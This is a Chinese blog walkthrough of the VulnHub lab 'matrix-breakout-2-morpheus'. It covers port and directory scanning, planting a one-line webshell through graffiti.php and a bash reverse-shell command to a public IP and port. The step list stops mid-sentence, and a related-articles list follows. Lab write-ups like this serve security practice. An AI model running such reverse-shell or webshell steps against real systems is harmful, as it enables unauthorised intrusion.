当前位置: 首页 > ops >正文

matrix-breakout-2-morpheus靶场通过

1、安装靶场

下载虚拟机(https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova)。

2、主机ip和端口

用nmap扫描一下ip和端口,主机ip是192.168.13.1,那我们靶场的ip就是192.168.13.144,并且22,80,81端口是开发的。

依次访问端口,发现81端口弹出一个登录框。

3、目录扫描

dirsearch -u 192.168.13.144  //在kali里用

可以发现有一个robots.txt。访问robots.txt,提示我们继续找找。可能是因为我们的字典太小了,我们找找有没有更大的字典。

gobuster dir -u http://192.168.13.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

通过gobuster扫描了一个几十万的字典,我们可以看到有一个graffiti.php,尝试访问。

4、抓包

随便输入一个数据,我们可以发现数据被传输到了graffiti.txt。

5、Getshell

抓包写一句话木马进去,用工具连接木马。

6、反弹shell

bash -i >& /dev/tcp/47.93.51.60/8888 0>&1

在目录里新建一个shell.sh,里面写我们的反弹shell,然后

http://www.xdnf.cn/news/16143.html

相关文章:

  • 详解FreeRTOS开发过程(五)-- 系统内核控制函数及任务相关API函数
  • 低功耗设计双目协同画面实现光学变焦内带AI模型
  • vs调试C++,无法显示长字符串所有内容
  • 上证50ETF期权的交易时间是什么时候?
  • 模块化商城的快速部署之道:ZKmall开源商城如何让电商功能即插即用
  • rustfs/rustfs基于 Rust 的高性能分布式存储系统
  • 多模态数据处理系统:用AI读PDF的智能助手系统分析
  • 物流仓储自动化升级:Modbus TCP与DeviceNet的协议融合实践
  • EVAL长度限制突破方法
  • java实体类常规校验(字符串不包含空格)
  • mac电脑(m1) - flask断点失效
  • 2025年区块链安全威胁全景:新兴漏洞、攻击向量与防护策略深度解析
  • 【数据结构初阶】--二叉树(二)
  • SAP-MM-采购订单批量创建 excel 版
  • MYOJ_10583:CSP初赛题单7:计算机常识综合练习
  • 人工智能与云计算双轮驱动:元宇宙如何重构全球产业生态
  • linux入门 相关linux系统操作命令(二)--文件管理系统 ubuntu22.04
  • Windows本地部署DeepSeek
  • Leetcode力扣解题记录--第2题(加法模拟)
  • 量子威胁下的区块链进化:后量子密码学时代的分布式账本革命
  • 从手动操作到自动化:火语言 RPA 在多系统协作中的实践
  • Elasticsearch 高级查询语法 Query DSL 实战指南
  • C#_定时器_解析
  • 光猫配置DMZ到路由器
  • 20-ospf技术
  • Kafka入门指南:从零开始掌握分布式消息队列
  • AI 在金融:重塑金融服务的智能革命
  • Linux中虚拟地址和物理地址互相转化之页表的详解
  • 微算法科技(NASDAQ: MLGO)研究量子信息递归优化(QIRO)算法,为组合优化问题拓展解决新思路
  • C++图论全面解析:从基础概念到算法实践